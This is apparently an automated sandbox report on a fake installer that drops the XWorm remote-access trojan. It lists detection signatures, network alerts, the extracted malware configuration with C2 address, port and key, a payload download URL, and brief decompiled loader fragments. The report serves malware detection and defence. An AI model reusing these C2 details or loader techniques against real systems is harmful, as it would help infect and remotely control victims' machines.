Edit tour

Windows Analysis Report
103-o_Installer.exe

Overview

General Information

Sample name:	103-o_Installer.exe
Analysis ID:	1466308
MD5:	dc4b9be7a5645d5c7fd18a4ac175830c
SHA1:	3b2a0dc310a1af35629fca61ae1ccc530b8c9a30
SHA256:	233e15fe06e10eb85efdd62345a90c62d43d30f2d01122d79fbc5299c25f3d81
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

103-o_Installer.exe (PID: 5508 cmdline: "C:\Users\user\Desktop\103-o_Installer.exe" MD5: DC4B9BE7A5645D5C7FD18A4AC175830C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["59.56.110.103"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x124f8:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\Public\Downloads\ind.cod	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 103-o_Installer.exe PID: 5508	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.103-o_Installer.exe.5390000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.103-o_Installer.exe.5390000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4cf2:$cnc4: POST / HTTP/1.1
0.2.103-o_Installer.exe.5390000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.103-o_Installer.exe.5390000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 59.56.110.103 - Destination IP: 192.168.2.7

Timestamp:	07/02/24-19:25:10.860430
SID:	2852870
Source Port:	7000
Destination Port:	49701
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.7 - Destination IP: 59.56.110.103

Timestamp:	07/02/24-19:21:24.908027
SID:	2855924
Source Port:	49701
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.7 - Destination IP: 59.56.110.103

Timestamp:	07/02/24-19:25:10.861342
SID:	2852923
Source Port:	49701
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.7 - Destination IP: 59.56.110.103

Timestamp:	07/02/24-19:23:11.014576
SID:	2853193
Source Port:	49701
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 59.56.110.103 - Destination IP: 192.168.2.7

Timestamp:	07/02/24-19:24:48.480603
SID:	2852874
Source Port:	7000
Destination Port:	49701
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["59.56.110.103"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: 103-o_Installer.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 103-o_Installer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack	String decryptor: 59.56.110.103
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack	String decryptor: 7000
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack	String decryptor: USB.exe

Source: 103-o_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 103-o_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 59.56.110.103:7000 -> 192.168.2.7:49701
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 59.56.110.103:7000 -> 192.168.2.7:49701
Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.7:49701 -> 59.56.110.103:7000
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.7:49701 -> 59.56.110.103:7000
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.7:49701 -> 59.56.110.103:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 59.56.110.103

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49700

Source: global traffic	TCP traffic: 192.168.2.7:49700 -> 91.208.240.157:881
Source: global traffic	TCP traffic: 192.168.2.7:49701 -> 59.56.110.103:7000

Source: Joe Sandbox View

ASN Name: CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\103-o_Installer.exe

Code function: 0_2_003A25C8 __EH_prolog,InternetReadFile,

0_2_003A25C8

Source: global traffic

HTTP traffic detected: GET /103.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: guanlix.cn

Source: 103-o_Installer.exe	String found in binary or memory: http://guanlix.cn:881/103.ccp
Source: 103-o_Installer.exe, 00000000.00000002.3670052787.000000000093C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://guanlix.cn:881/103.ccph
Source: 103-o_Installer.exe, 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\Public\Downloads\ind.cod, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\103-o_Installer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B007E	0_2_003B007E
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B5A2A	0_2_003B5A2A
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B738F	0_2_003B738F
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003AFBE9	0_2_003AFBE9
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B0BD6	0_2_003B0BD6
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B041C	0_2_003B041C
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B54D9	0_2_003B54D9
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B6657	0_2_003B6657
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B5F7B	0_2_003B5F7B
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B7F4F	0_2_003B7F4F
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003B07EE	0_2_003B07EE
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053A55D8	0_2_053A55D8
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053AA290	0_2_053AA290
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053A4D08	0_2_053A4D08
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053AAFD0	0_2_053AAFD0
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053AE918	0_2_053AE918
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053A07A0	0_2_053A07A0
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053A49C0	0_2_053A49C0

Source: C:\Users\user\Desktop\103-o_Installer.exe

Code function: String function: 003AA9B0 appears 45 times

Source: 103-o_Installer.exe, 00000000.00000000.1226802743.00000000003C3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewindos.exe. vs 103-o_Installer.exe
Source: 103-o_Installer.exe, 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs 103-o_Installer.exe
Source: 103-o_Installer.exe	Binary or memory string: OriginalFilenamewindos.exe. vs 103-o_Installer.exe

Source: 103-o_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\Public\Downloads\ind.cod, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@1/2

Source: C:\Users\user\Desktop\103-o_Installer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp

Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\103-o_Installer.exe	Mutant created: \Sessions\1\BaseNamedObjects\tJeTNPzvlX6aPF3G

Source: 103-o_Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\103-o_Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 103-o_Installer.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\103-o_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: 103-o_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 103-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 103-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 103-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 103-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 103-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\103-o_Installer.exe

Code function: 0_2_003B40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_003B40E4

Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003A4948 push eax; ret	0_2_003A4966
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003AA9F5 push ecx; ret	0_2_003AAA08
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_003A6649 push ecx; ret	0_2_003A665C
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053AC0A8 push eax; retf 0301h	0_2_053ACC2D
Source: C:\Users\user\Desktop\103-o_Installer.exe	Code function: 0_2_053A6B88 pushad ; ret	0_2_053A6B89

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49700

Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
